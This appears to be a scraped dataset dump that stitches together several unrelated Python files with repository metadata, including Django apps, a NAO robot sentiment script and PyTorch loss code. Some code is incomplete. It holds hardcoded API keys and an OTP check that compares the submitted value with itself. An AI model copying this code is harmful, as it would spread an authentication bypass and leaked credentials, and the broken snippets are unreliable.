if __name__ == '__main__':
unittest.main()
| [
"gongwayne@hotmail.com"
] | gongwayne@hotmail.com |
e83ef981ade8159a74fb28725be34ea4e32f12bb | 0464dbe98f9cbde449a0cdc53460df8871ff0410 | /MachineLearningAndAIFoundationsValueEstimations/Ex_Files_Machine_Learning_EssT_ValueEstimate/Exercise Files/Chapter 6/feature_selection.py | decec26f727f4ecd64cf56cf49922e68a9a2b9b8 | [] | no_license | Gurubux/LinkedIn-Learn | 6ad2cde76aa6012ea5795c4478a5186dd83bcfa6 | a7625ca289f5b75ca1d65777e929f5adbdba553d | refs/heads/master | 2022-05-22T04:10:52.001252 | 2022-05-01T16:27:57 | 2022-05-01T16:27:57 | 194,151,321 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,919 | py | import numpy as np
from sklearn.externals import joblib
# These are the feature labels from our data set
feature_labels = np.array(['year_built', 'stories', 'num_bedrooms', 'full_bathrooms', 'half_bathrooms', 'livable_sqft', 'total_sqft', 'garage_sqft', 'carport_sqft', 'has_fireplace', 'has_pool', 'has_central_heating', 'has_central_cooling', 'garage_type_attached', 'garage_type_detached', 'garage_type_none', 'city_Amystad', 'city_Brownport', 'city_Chadstad', 'city_Clarkberg', 'city_Coletown', 'city_Davidfort', 'city_Davidtown', 'city_East Amychester', 'city_East Janiceville', 'city_East Justin', 'city_East Lucas', 'city_Fosterberg', 'city_Hallfort', 'city_Jeffreyhaven', 'city_Jenniferberg', 'city_Joshuafurt', 'city_Julieberg', 'city_Justinport', 'city_Lake Carolyn', 'city_Lake Christinaport', 'city_Lake Dariusborough', 'city_Lake Jack', 'city_Lake Jennifer', 'city_Leahview', 'city_Lewishaven', 'city_Martinezfort', 'city_Morrisport', 'city_New Michele', 'city_New Robinton', 'city_North Erinville', 'city_Port Adamtown', 'city_Port Andrealand', 'city_Port Daniel', 'city_Port Jonathanborough', 'city_Richardport', 'city_Rickytown', 'city_Scottberg', 'city_South Anthony', 'city_South Stevenfurt', 'city_Toddshire', 'city_Wendybury', 'city_West Ann', 'city_West Brittanyview', 'city_West Gerald', 'city_West Gregoryview', 'city_West Lydia', 'city_West Terrence'])
# Load the trained model created with train_model.py
model = joblib.load('trained_house_classifier_model.pkl')
# Create a numpy array based on the model's feature importances
importance =
# Sort the feature labels based on the feature importance rankings from the model
feauture_indexes_by_importance = importance.argsort()
# Print each feature label, from most important to least important (reverse order)
for index in feauture_indexes_by_importance:
print("{} - {:.2f}%".format(feature_labels[index], (importance[index] * 100.0)))
| [
"d_gurbux@yahoo.com"
] | d_gurbux@yahoo.com |
ccd95d42aaf08c0741f3019bcbc7eb7649bdcbc6 | ba3168d4b6932fc73d9fb8aa83a02a31e536e096 | /courses/BigData/tutorial/tutorial4/vector_dule.py | a855758d89631704118f272af40bef8f943b2fd7 | [] | no_license | xuhappy/xuhappy.github.io | dce02b72920e6997c1695a54b54c84dfb2991f85 | 63a01fd23b7688a6497a6063e318a5b6412710e2 | refs/heads/master | 2023-02-21T16:54:32.622865 | 2023-02-15T11:59:05 | 2023-02-15T11:59:05 | 78,627,996 | 5 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,791 | py | # -*- coding: utf-8 -*-
"""
Spyder Editor
This is a temporary script file.
"""
#import xlwt
import numpy as np
path="./data/parsec_2.log"
kvmcpu=16
kvmmem=16
nodecore=32
nodemem=1
cache_l3=1
imp1=225
imp2=113
def kvmvec(place,kvm):
vec=[]
placement = []
vmnumber=int(len(place)/2)
nodelist=place[:vmnumber]
memlist=place[vmnumber:]
vec.append(kvmcpu)
if kvm in place[0] and kvm in place[1]:
placement.append(2)
elif kvm in place[0]:
placement.append(0)
else:
placement.append(1)
if kvm in place[2] and kvm in place[3]:
placement.append(2)
elif kvm in place[2]:
placement.append(0)
else:
placement.append(1)
for item in nodelist:
if kvm in item:
vec.append(nodecore)
else:
vec.append(0)
vec.append(kvmmem)
for item in memlist:
if kvm in item:
vec.append(nodemem/(len(item)-1))
else:
vec.append(0)
for item in memlist:
if kvm in item:
vec.append(cache_l3/(len(item)-1))
else:
vec.append(0)
#print(vec)
return vec, placement
def kvmipc(counters):
ipc=0.0
vmnumber=int(len(counters)/2)
cyl=counters[:vmnumber]
ins=counters[vmnumber:]
for index in range(len(cyl)):
cylnum=cyl[index].replace(',','')
insnum=ins[index].replace(',','')
#print(insnum)
#ipc+= float(insnum)/float(cylnum)
ipc+=float(insnum)/3
return ipc/3
def main():
try:
file = open(path, 'r')
except:
print("open error")
data=[]
placement = []
num=0
numline = 0
for line in file.readlines():
# 处理资源向量
if len(line) == 1:
break
if num==0:
ipc=0
place=line.split('-')
print(place)
del place[0]
#print(len(line))
#print(place)
vec_a,place_a=kvmvec(place,'A')
vec_b,place_b=kvmvec(place,'B')
vec_c,place_c=kvmvec(place,'C')
num=num+ 1
# 处理ipc
else:
counters=line.split(' ')
#print(counters)
ipc+= kvmipc(counters)
if numline == 729:
print(ipc)
num=num+1
if num==6:
numline = numline + 1
vec=vec_a+vec_b+vec_c
place = place_a + place_b + place_c
#print(ipc/5)
vec.append(ipc/5)
#place.append(ipc/5)
data.append(vec)
placement.append(place)
num=0
#处理icp与自由调度的比值,以及2个重要placement
# ipc_imp1=data[imp1][-1]
# ipc_imp2=data[imp2][-1]
for index in range(len(data)):
ipc_raito=data[index][-1]/data[-1][-1]
# important1_ipc=ipc_imp1/data[-1][-1]
# important2_ipc=ipc_imp2/data[-1][-1]
del data[index][-1]
# data[index].append(important1_ipc)
# data[index].append(important2_ipc)
data[index].append(ipc_raito)
placement[index].append(ipc_raito)
# print(placement[index])
data_train=np.array(data)
f1 = open('./data/placementlog.txt','w')
for fp in placement:
f1.write(str(fp))
f1.write('\n')
# f1.write(placement)
f1.close()
placement_train=np.array(placement)
print(placement_train)
# np.save('./data/train2',data_train)
np.save('./data/placement_train',placement_train)
if __name__ == '__main__':
main()
| [
"xu900611@163.com"
] | xu900611@163.com |
0801f7f90f0e933d99852bb658048de229aa47bd | 16c1ec9ef98198a13c3b8288867a1249ef381724 | /foreground/models.py | d461acf80bb90679613390a2e948646598ec238c | [] | no_license | GKrator/sbx | be476e0fe155a0fbc5260c4950a6b4543babd7aa | d59ad98a0785557e44256344059f5d7037e4716c | refs/heads/master | 2021-01-17T11:24:44.788435 | 2016-07-11T14:31:31 | 2016-07-11T14:31:31 | 59,398,793 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 253 | py | from django.db import models
# Create your models here.
class Person(models.Model):
name = models.CharField(max_length=30)
email = models.CharField(max_length=30)
subject = models.CharField(max_length=30)
message = models.CharField(max_length=255)
| [
"iamxifan@163.com"
] | iamxifan@163.com |
4ec59db94642f82eb9818ed5ac9f887f33b389ee | c75c6e331b965274e888383b053eaa1041310e7d | /learn/algorithms/stack.py | ef750aa72855fb4e05d64b1e590d267b2ddef2e8 | [] | no_license | poleha/py_examples | d8f0b418bbd1da796a6a5a5943d0727e5af2bafc | 2b272e2f76dcd892be628483ed7df0721c525dd7 | refs/heads/master | 2020-12-20T23:40:51.144546 | 2017-11-07T06:22:36 | 2017-11-07T06:22:36 | 56,224,323 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 577 | py | class Stack:
def __init__(self):
self.items = []
def isEmpty(self):
return self.items == []
def push(self, item):
self.items.append(item)
def pop(self):
return self.items.pop()
def peek(self):
return self.items[len(self.items) - 1]
def size(self):
return len(self.items)
def __str__(self):
return str(self.items)
def __iter__(self):
return self
def __next__(self):
try:
return self.pop()
except IndexError:
raise StopIteration
| [
"pass1191"
] | pass1191 |
ac19680243ea502dad7cc96ee6667e26441ba9f8 | 3040fb6c84b42335ad6cda8ee3cc0e1c8c88f18e | /polls_app/mysite/mysite/urls.py | b537d76b031806e77f1dd979c7480b0b4f1b35fa | [] | no_license | KhusniddinovUz/Django | 9ef59d4cabedb933b3cd685cb803463027c1a2c2 | 387d682069bd12d7ecb8aeabeb3f3b0b699199ef | refs/heads/master | 2023-08-02T06:10:21.360575 | 2021-09-19T11:55:18 | 2021-09-19T11:55:18 | 315,987,764 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 163 | py | from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('', include('polls.urls')),
path('admin/', admin.site.urls)
]
| [
"khusniddinovuz@gmail.com"
] | khusniddinovuz@gmail.com |
682c3006239ca02d254b7791ca951c15dbe875dc | cd931198652185627b0bd5a13594a5bf4abe952b | /src/testing/hello_detection.py | 72208a85714c536a9421233317a34f7af44b967a | [
"MIT"
] | permissive | qu0b/AST | dfce63155faa7912f76e71434da907f5c2c55a33 | 5767dc5de6af92659fee91d1724f6d7b7eb1f521 | refs/heads/master | 2021-03-24T12:29:44.377996 | 2018-01-30T11:39:33 | 2018-01-30T11:39:33 | 108,642,838 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,791 | py | # -*- encoding: UTF-8 -*-
""" Say 'hello, you' each time a human face is detected
"""
import sys
import time
import json
import requests
from naoqi import ALProxy
from naoqi import ALBroker
from naoqi import ALModule
from optparse import OptionParser
import xml.etree.ElementTree as ET
def excell():
root = ET.parse('parse.xml')
configs = []
moods = []
for elem in root.findall("//connector/from[@instance='NAO red']/../to"):
# How to make decisions based on attributes even in 2.6:
moods.append(elem.attrib['instance'])
for mood in moods:
tempobj = {'mood': mood, 'range': '', 'color': '', 'song': ''}
for g in root.findall("//instance[@name='"+mood+"']//attribute[@name='Emotional range']"):
tempobj['range'] = g.text
for elem in root.findall("//connector/from[@instance='"+mood+"']/../to[@class='Color']"):
for e in root.findall("//instance[@name='"+elem.attrib['instance']+"']//attribute[@name='Color']"):
tempobj['color'] = e.text
for elem in root.findall("//connector/from[@instance='"+mood+"']/../to[@class='Music']"):
tempobj['song'] = elem.attrib['instance']
configs.append(tempobj)
return configs
NAO_IP = "192.168.75.41"
vocabulary = ["home", "record"]
SoundDetection = None
memory = None
asr = None
class SoundDetectionModule(ALModule):
""" A simple module able to react
to sound detection events
"""
def __init__(self, name):
ALModule.__init__(self, name)
# No need for IP and port here because
# we have our Python broker connected to NAOqi broker
global asr
# Create a proxy to ALTextToSpeech for later use
asr = ALProxy("ALSpeechRecognition")
self.tts = ALProxy("ALTextToSpeech")
asr.setLanguage("English")
asr.pause(True)
asr.setVocabulary(vocabulary, False)
asr.pause(False)
asr.subscribe("Test_ASR")
# Subscribe to the FaceDetected event:
global memory
memory = ALProxy("ALMemory")
memory.subscribeToEvent("WordRecognized", "SoundDetection", "onWordRecognized")
def onWordRecognized(self, key, value, message):
""" This will be called each time a word is
recognized.
"""
#try:
memory.unsubscribeToEvent("WordRecognized", "SoundDetection")
if(len(value) > 1 and value[1] >= 0.4):
uri_cl1 = "http://192.168.75.102/api/GKcPe6ugIOV0JMNlYUyTlkKMeMCvXdViFerMED25/lights/1/state"
#requests.put(uri_cl1, json = {"effect":"colorwheel"}, headers = {'Content-Type': 'application/json'})
self.tts.say("Recording")
import subprocess
recorder = ALProxy("ALAudioRecorder")
self.tts.say("Starting recorder")
recorder.stopMicrophonesRecording()
recorder.startMicrophonesRecording("/home/nao/test.wav", "wav", 16000, (1,0,0,0))
time.sleep(5)
recorder.stopMicrophonesRecording()
self.tts.say("stopping recorder, analyzing your mood")
subprocess.call(["scp", "nao@192.168.75.41:test.wav","."])
print("creating flac")
subprocess.call(["/Users/stefanstarflinger/Downloads/sox-14.4.2/sox", "test.wav","test.flac"])
print("copying audio file to google cloud")
subprocess.call(["gsutil", "cp","test.flac","gs://audio-for-semtec/"])
token_raw = subprocess.Popen(["gcloud", "auth", "application-default", "print-access-token"], stdout=subprocess.PIPE)
token = token_raw.stdout.read()[:-1]
headers = {"Content-Type": "application/json", "Authorization": "Bearer "+token}
uri = "https://speech.googleapis.com/v1/speech:recognize"
data = json.load(open('sync-request.json'))
print("audio to text")
r = requests.post(uri, json=data, headers=headers)
print(r.text)
text = json.loads(r.content)["results"][0]["alternatives"][0]["transcript"]
print(text)
data_sent = {"document": {"type": "PLAIN_TEXT", "content":text}, "encodingType":"UTF8"}
print("sentiment analysis")
uri_sent = 'https://language.googleapis.com/v1/documents:analyzeSentiment?key=AIzaSyA671KhhlHRqQ_ZxmVou7GaLct_b-Txdes'
print("sentiment analysis resluts")
r_sent = requests.post(uri_sent, json=data_sent)
print(r_sent.text)
led = ALProxy("ALLeds")
player = ALProxy ("ALAudioPlayer")
colors = {"Blue":{"on": True, "bri": 150, "hue": 5448, "sat": 233, "effect": "none", "xy": [ 0.1639, 0.1904 ], "ct": 500}, "Orange":{"on": True, "bri": 80, "hue": 15448, "sat": 233, "effect": "none", "xy": [ 0.5639, 0.4404 ], "ct": 500}, "Red":{"on": True, "bri": 80, "hue": 25448, "sat": 233, "effect": "none", "xy": [ 0.7339, 0.3904 ], "ct": 500}, "Purple":{"on": True, "bri": 87, "hue": 5448, "sat": 233, "effect": "none", "xy": [ 0.4639, 0.1904 ], "ct": 500}, "Green":{"on": True, "bri": 57, "hue": 5448, "sat": 233, "effect": "none", "xy": [ 0.1639, 0.8904 ], "ct": 500}}
print('change led color')
sentimentScore = float(json.loads(r_sent.content)["documentSentiment"]["score"])
print sentimentScore
sent = ''
if(sentimentScore >= 0.5):
sent = "Very positive"
elif(sentimentScore >= 0):
sent = "Positive"
elif(sentimentScore >=-0.7):
sent = "Negative"
elif(sentimentScore >=-1):
sent = "Very negative"
configs = excell()
for config in configs:
if(sent == config["range"]):
fileId = player.loadFile("/home/nao/"+config["song"]+".wav")
requests.put(uri_cl1, json = colors[config["color"]], headers = {'Content-Type': 'application/json'})
player.play(fileId)
self.tts.say("you seem to be "+config["mood"])
col = config["color"]
if(col=="Orange"):
col="red"
led.fadeRGB("AllLeds", col.lower(), 3)
else: pass
#if(sentimentScore > 0):
# fileId = player.loadFile("/home/nao/scream.wav")
# player.play(fileId)
# requests.put(uri_cl1, json = blue, headers = {'Content-Type': 'application/json'})
# self.tts.say("you seem to be happy")
# led.fadeRGB("AllLeds", "blue", 3)
#else:
# requests.put(uri_cl1, json = candle, headers = {'Content-Type': 'application/json'})
# self.tts.say("you seem to be sad")
# led.fadeRGB("AllLeds", "red", 3)
# self.tts.say("awwwwwwwwwwwwww")
print(r_sent.text)
memory.subscribeToEvent("WordRecognized", "SoundDetection", "onWordRecognized")
else:
self.tts.say("I didnt Catch that")
time.sleep(1)
memory.subscribeToEvent("WordRecognized", "SoundDetection", "onWordRecognized")
#except Exception:
# print(Exception)
def main():
""" Main entry point
"""
parser = OptionParser()
parser.add_option("--pip",
help="Parent broker port. The IP address or your robot",
dest="pip")
parser.add_option("--pport",
help="Parent broker port. The port NAOqi is listening to",
dest="pport",
type="int")
parser.set_defaults(
pip=NAO_IP,
pport=9559)
(opts, args_) = parser.parse_args()
pip = opts.pip
pport = opts.pport
# We need this broker to be able to construct
# NAOqi modules and subscribe to other modules
# The broker must stay alive until the program exists
myBroker = ALBroker("myBroker",
"0.0.0.0", # listen to anyone
0, # find a free port and use it
pip, # parent broker IP
pport) # parent broker port
# Warning: HumanGreeter must be a global variable
# The name given to the constructor must be the name of the
# variable
global SoundDetection
SoundDetection = SoundDetectionModule("SoundDetection")
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
print
print "Interrupted by user, shutting down"
memory.subscribeToEvent("WordRecognized", "SoundDetection", "onWordRecognized")
myBroker.shutdown()
sys.exit(0)
if __name__ == "__main__":
main() | [
"st3f4n.s@googlemail.com"
] | st3f4n.s@googlemail.com |
22d284e6024960ee996e0e63cfb1a897b4f8961f | c938e81195a8c8e55d97361e81696f5669ce035d | /authapp/views.py | 82b260d601ad51d80e89f4a1c9b2f379379a62dc | [] | no_license | varunnkrishna/ecommshop | 6ae7bde8ce324d97681e26a262ca4a3ddcafbe6a | 4afd8f3a362205843b40da1af1fe3171497d77e6 | refs/heads/master | 2020-08-31T13:24:38.536107 | 2019-11-12T12:13:05 | 2019-11-12T12:13:05 | 218,700,269 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,523 | py | from django.shortcuts import render, redirect
from django.http import HttpResponse
import json
from django.contrib.auth.models import User
from django.shortcuts import render
from django.http import HttpResponse
from django.utils import http
from .models import Register
from .forms import LoginForm
from .forms import RegForm
import random
import http.client
from django.contrib.auth import authenticate,logout
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import User, auth
from django.core.mail import send_mail
# Create your views here.
def register(request):
if request.method=='POST':
reg= RegForm(request.POST)
if reg.is_valid():
x=otp_send(request)
if x:
return render(request,'homeapp/otp_input.html')
else:
return render(request,'authapp/signup.html')
else:
return render(request,'authapp/signup.html')
else:
return render(request, 'authapp/signup.html')
def otpvalidation(request):
newotp=request.POST['otp']
oldotp=request.POST['otp']
if newotp==oldotp:
form=RegForm(request.session['details'])
new_user=User.objects.create_user(username=request.session["uname"],password=request.session['pwd'])
new_user.save()
form.save()
login(request)
return render(request,'homeapp/price.html')
else:
return render(request,'authapp/otp_input.html')
def otp_send(request):
ot = str(random.randint(100000, 999999))
phno=request.POST["phno"]
request.session["uname"]=request.POST["uname"]
request.session["pwd"] = request.POST["pwd"]
# subject="registation otp"
request.session["details"]=request.POST
request.session["otp"]=ot
conn=http.client.HTTPConnection("api.msg91.com")
payload = "{\"sender\":\"VARUNK\", \"route\": \"4\", \"country\": \"91\", \"sms\": [{\"message\":\"" + ot + "\", \"to\": [\"" + phno + "\"]}]}"
headers={'authkey':"301145AUnx4zFX7wp5db6e535",
'content-type':"application/json"}
conn.request("POST","/api/v2/sendsms?country=91&sender=&route=&mobiles=&authkey=&encrypt=&message=&flash=&unicode=&schtime=&aferminute=&response=&campaign=",payload,headers)
data=conn.getresponse()
print('otp_send sucess')
res = json.loads(data.read().decode("UTF-8"))
print('res sucess')
print(res)
if res["type"] == "success":
return True
else:
return False
# @login_required
def login(request):
if request.method == 'POST':
uname = request.POST['uname']
pwd = request.POST['pwd']
user = authenticate(username=uname, password=pwd)
if user is not None:
# send_useremail(request)
# return HttpResponse(request.user.is_authenticated)
auth.login(request, user)
return render(request, 'homeapp/index.html')
else:
return HttpResponse('not sucess')
else:
return render(request, 'authapp/signin.html')
# return render(request,'homeapp/price.html')
def logout(request):
auth.logout(request)
# logout(request)
return render(request,'homeapp/index.html')
# def send_useremail(request):
# send_mail('Welcome to our Shop',
# 'this is a welcome message','varunandpython@gmail.com',
# ['90.varunkrishna@gmail.com'],fail_silently=False)
| [
"90.varunkrishna@gmail.com"
] | 90.varunkrishna@gmail.com |
f07f19f260db04c99168a9086e762d2241a66eaa | d3eb700ac300f1337810b666205c28a0c09ca906 | /problems/migrations/0004_auto_20190625_1748.py | 3c8ba7f589d7a659ba783f54f8a82f8a9ff7bd4d | [] | no_license | prateek2211/quizme | 9f5c4b6963d68870e3a4fe2bcbad233f41a59abc | 298bec83f92408a7f493c834dda0e32d6baff7a4 | refs/heads/master | 2022-12-16T17:33:17.408041 | 2020-05-30T06:02:01 | 2020-05-30T06:02:01 | 195,078,205 | 0 | 0 | null | 2022-12-08T05:52:24 | 2019-07-03T15:08:50 | Python | UTF-8 | Python | false | false | 694 | py | # Generated by Django 2.2.2 on 2019-06-25 17:48
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('problems', '0003_auto_20190625_1746'),
]
operations = [
migrations.RemoveField(
model_name='problem',
name='author',
),
migrations.AddField(
model_name='problem',
name='author',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
]
| [
"psachan@cs.iitr.ac.in"
] | psachan@cs.iitr.ac.in |
22d609a1e0b11f908b42d7cfcefe3e6f44eae021 | 1fdf153c14eb70eba8ad59b41ac0e53cf7611bd0 | /backend/scholar/apps/projects/migrations/0003_auto_20180407_2358.py | fde882ce866125c2fcbe55fe35548de7461cfe6f | [] | no_license | kegeer/xsv2 | b0814ff853e54c260701b6945f1e3083d66169f1 | 1a8bdea0fe946727ae8283c5a5346db88ddeb783 | refs/heads/master | 2022-12-15T00:22:24.467965 | 2018-04-12T23:48:52 | 2018-04-12T23:48:52 | 129,317,782 | 0 | 0 | null | 2022-12-08T01:00:45 | 2018-04-12T22:27:28 | JavaScript | UTF-8 | Python | false | false | 433 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.10 on 2018-04-07 15:58
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('projects', '0002_auto_20180407_2348'),
]
operations = [
migrations.RenameField(
model_name='oss',
old_name='mine_type',
new_name='mime_type',
),
]
| [
"zhangkeger@qq.com"
] | zhangkeger@qq.com |
c5972fb966191bc7e25aec8a9fcf0929d506b19e | 857461387f55d9f34d5c7e408f03887dc68abcf9 | /08_Recursion_and_Dynamic_Programming/SubsetsGeneration/solution.py | 85ed6f5fdab96451319d5d907dee29d7be42eccc | [] | no_license | efrencodes/Interview-Questions | 579995e18e14fcc8f21aa5b6ab647ab775d2a5ac | 1049d6a6eb5fe3f28e9d4eb9064cf53af0e68559 | refs/heads/master | 2022-04-05T05:07:55.717290 | 2020-02-09T21:16:48 | 2020-02-09T21:16:48 | 294,033,060 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 323 | py | a = ['a','b','c','d']
def subset(arr, cur, res, ind):
# print(cur, ind)
if ind > len(arr):
return
if ind == len(arr):
test = list(cur)
res.append(test)
return
subset(arr, cur, res, ind+1)
cur.append(arr[ind])
subset(arr, cur, res, ind+1)
cur.pop()
res = []
subset(a, [], res, 0)
print(res)
print(len(res))
| [
"noreply@github.com"
] | efrencodes.noreply@github.com |
ab4b58c9f57d81b86dab68de0f9e7f748fa7cce3 | 7680dbfce22b31835107403514f1489a8afcf3df | /Exercícios_parte_2/exercício__090.py | ee3ab125b849a111a10a421c0ee9807bb6c49dac | [] | no_license | EstephanoBartenski/Aprendendo_Python | c0022d545af00c14e6778f6a80f666de31a7659e | 69b4c2e07511a0bd91ac19df59aa9dafdf28fda3 | refs/heads/master | 2022-11-27T17:14:00.949163 | 2020-08-03T22:11:19 | 2020-08-03T22:11:19 | 284,564,300 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,083 | py | # dicionários
print('--' * 17)
print(' CADASTRO DE NOTAS')
print('--' * 17)
aluno = dict()
aluno['nome'] = str(input('Nome: ')).strip().capitalize()
aluno['med'] = float(input('Média de {}: '.format(aluno['nome'])))
print()
print(f' - O nome é {aluno["nome"]}.\n'
f' - A média é {aluno["med"]:.2f}.')
if aluno['med'] >= 7:
print(' - Situação: APROVADO!')
aluno['situação'] = 'aprovado'
elif 5 <= aluno['med'] < 7:
print(' - Situação: RECUPERAÇÃO!')
aluno['situação'] = 'recuperação'
else:
print(' - Situação: REPROVADO!')
aluno['situação'] = 'reprovado'
print()
print(aluno)
# outra resolução:
'''aluno = dict()
aluno['nome'] = str(input('Nome: ')).strip().capitalize()
aluno['med'] = float(input(f'Média de {aluno["nome"]} '))
if aluno['med'] >= 7:
aluno['situação'] = 'Aprovado'
elif 5 <= aluno['med'] < 7:
aluno['situação'] = 'Recuperação'
else:
aluno['situação'] = 'Reprovado'
print('--' * 30)
for k, v in aluno.items():
print(f' - {k} é igual a {v}')''' | [
"noreply@github.com"
] | EstephanoBartenski.noreply@github.com |
f43106f2bbad97ce033f51800ec1c592fd55ad07 | c9de0bbab78c282c9e9ca8b66215bd1f1fb52d3c | /fundamentos/desafio.py | 4065056bfd80f07c9c06df0d82311a171e767b46 | [] | no_license | eduardoldk-hub/curso_python | c8e6a34ee90cc6a5ca9654abf13cea54c197a51a | 6dfe629594de754b7d014876f744152953c02a3b | refs/heads/master | 2022-08-20T19:40:29.681084 | 2020-05-20T19:11:02 | 2020-05-20T19:11:02 | 265,662,805 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 179 | py | # Calcular quantos porcento do salario está comprometico a pagar
# as despesas
salario = 3450.45
despesas = 2456.2
porcentagem_gasta = salario - despesas * 100 / 2
| [
"eduardoldk@outlook.com"
] | eduardoldk@outlook.com |
6a30cbfb25c3756b58f923dd2d8b1a34a2949c11 | 02316317d5016b309c59fee039c09f349910fab4 | /pt_restore.py | 95551cd42e2d6746634a5d81edec09e6d418ff2c | [] | no_license | JaChouSSS/the-pytorch-implementation-of-Kindling-the-Darkness-A-Practical-Low-light-Image-Enhancer- | 568ae742d041a20e05fa71790778bd96c5f15973 | f44eee315b6abfd7d9e92824900bf58bfe77c4ac | refs/heads/master | 2023-08-15T05:26:23.970127 | 2021-09-25T06:05:10 | 2021-09-25T06:05:10 | 289,166,381 | 16 | 1 | null | null | null | null | UTF-8 | Python | false | false | 22,836 | py | import random
from model3 import *
from pt_utils import *
import torch.optim as optim
import os
import torch
import glob
import cv2
import time
from torch.utils.data import Dataset, DataLoader
from padding_same_conv import *
######################### decomnet
#########################
def pt_grad_loss(input_r_low, input_r_high):
    """Gradient-consistency loss between two reflectance maps.

    Both RGB reflectance tensors are converted to grayscale, and the loss is
    the mean of the squared differences between their horizontal and vertical
    image gradients (computed by ``gradient2`` from the project utilities).

    Args:
        input_r_low:  reflectance decomposed from the low-light input.
        input_r_high: reflectance decomposed from the normal-light input.

    Returns:
        Scalar tensor: mean((dx_low - dx_high)^2 + (dy_low - dy_high)^2).
    """
    to_gray = RGB2Gray().cuda()  # NOTE(review): assumes CUDA inputs — confirm
    low_gray = to_gray(input_r_low)
    high_gray = to_gray(input_r_high)
    total = 0
    for axis in ('x', 'y'):
        diff = gradient2(low_gray, axis) - gradient2(high_gray, axis)
        total = total + diff.pow(2)
    return torch.mean(total)
def gauss(size, sigma):
    """Build a normalized 2-D Gaussian kernel of shape (1, 1, size, size).

    Mimics MATLAB's ``fspecial('gaussian', size, sigma)``: the kernel is
    centered, symmetric, and its entries sum to 1, making it suitable as a
    depthwise convolution weight for local averaging (e.g. in SSIM).

    Args:
        size:  side length of the square window.
        sigma: standard deviation of the Gaussian.

    Returns:
        float32 tensor shaped (1, 1, size, size) that sums to 1.
    """
    # Integer coordinate grid centered on the window midpoint.
    rows, cols = np.mgrid[-size // 2 + 1:size // 2 + 1,
                          -size // 2 + 1:size // 2 + 1]
    # Add leading (out_channels, in_channels) axes expected by conv2d weights.
    rr = torch.Tensor(rows).unsqueeze(0).unsqueeze(0)
    cc = torch.Tensor(cols).unsqueeze(0).unsqueeze(0)
    kernel = torch.exp(-(rr ** 2 + cc ** 2) / (2.0 * sigma ** 2))
    # Normalize so the filter preserves the local mean.
    return kernel / kernel.sum()
def pt_ssim(img1, img2, cs_map=False, mean_metric=True, size=11, sigma=1.5):
    """Single-scale SSIM between two one-channel image batches (NCHW tensors).

    Inputs are assumed to lie in [0, 1] (hence the dynamic range L = 1).
    With mean_metric=True (default) a scalar mean SSIM is returned; with
    cs_map=True a (ssim_map, contrast_structure_map) tuple is produced
    instead of the plain SSIM map.
    """
    window = gauss(size, sigma) # Gaussian weighting window, shape (1, 1, size, size)
    K1 = torch.Tensor([0.01]).cuda()
    K2 = torch.Tensor([0.03]).cuda()
    L = torch.Tensor([1]).cuda() # dynamic range of the images (would be 255 for uint8 data)
    C1 = torch.pow(K1*L,2)
    C2 = torch.pow(K2*L,2)
    # Local means via Gaussian filtering; no padding, so the maps shrink by size-1.
    weight = nn.Parameter(data=window, requires_grad=False).cuda()
    mu1 = F.conv2d(img1,weight).cuda()
    mu2 = F.conv2d(img2,weight).cuda()
    mu1_sq = mu1*mu1
    mu2_sq = mu2*mu2
    mu1_mu2 = mu1*mu2
    # Local (co)variances under the same window: E[x*y] - E[x]E[y].
    sigma1_sq = F.conv2d(img1*img1,weight).cuda()- mu1_sq
    sigma2_sq = F.conv2d(img2*img2,weight).cuda()- mu2_sq
    sigma12 = F.conv2d(img1*img2,weight).cuda()- mu1_mu2
    if cs_map:
        value = (((2*mu1_mu2 + C1)*(2*sigma12 + C2))/((mu1_sq + mu2_sq + C1)*
                    (sigma1_sq + sigma2_sq + C2)),
                (2.0*sigma12 + C2)/(sigma1_sq + sigma2_sq + C2))
    else:
        value = ((2*mu1_mu2 + C1)*(2*sigma12 + C2))/((mu1_sq + mu2_sq + C1)*
                    (sigma1_sq + sigma2_sq + C2))
    if mean_metric:
        value = torch.mean(value)
    return value
def pt_ssim_loss(output_r, input_high_r):
    """(1 - SSIM) dissimilarity between two RGB images, averaged per channel."""
    channel_scores = []
    for c in range(3):  # evaluate SSIM separately on R, G and B
        pred_chan = output_r[:, c:c + 1, :, :]
        target_chan = input_high_r[:, c:c + 1, :, :]
        channel_scores.append(pt_ssim(pred_chan, target_chan))
    mean_ssim = (channel_scores[0] + channel_scores[1] + channel_scores[2]) / 3.0
    loss_ssim1 = 1 - mean_ssim
    print('pt ssim loss :', loss_ssim1)
    return loss_ssim1
def grad_loss(input_i_low, input_i_high):
    """Mean squared difference of x/y image gradients of two illumination maps."""
    diff_x = gradient2(input_i_low, 'x') - gradient2(input_i_high, 'x')
    diff_y = gradient2(input_i_low, 'y') - gradient2(input_i_high, 'y')
    return torch.mean(diff_x ** 2 + diff_y ** 2)
# def adjust_loss(output_r , input_high_r):
# loss_ssim = pt_ssim_loss(output_r, input_high_r)
# loss_grad = pt_grad_loss(output_r, input_high_r)
# loss_square = torch.mean(tf.square(output_r - input_high_r)) # * ( 1 - input_low_r ))#* (1- input_low_i)))
# loss_adjust = loss_square + loss_grad + loss_ssim
# return loss_adjust
class restore_loss(nn.Module):
    """Restoration loss: pixel-wise L2 + gradient consistency + (1 - SSIM)."""

    def __init__(self):
        super(restore_loss, self).__init__()

    def forward(self, output_r, input_high_r):
        # Pixel-wise squared error between restored and reference reflectance.
        squared_term = torch.mean((output_r - input_high_r) ** 2)
        # Edge-structure term.
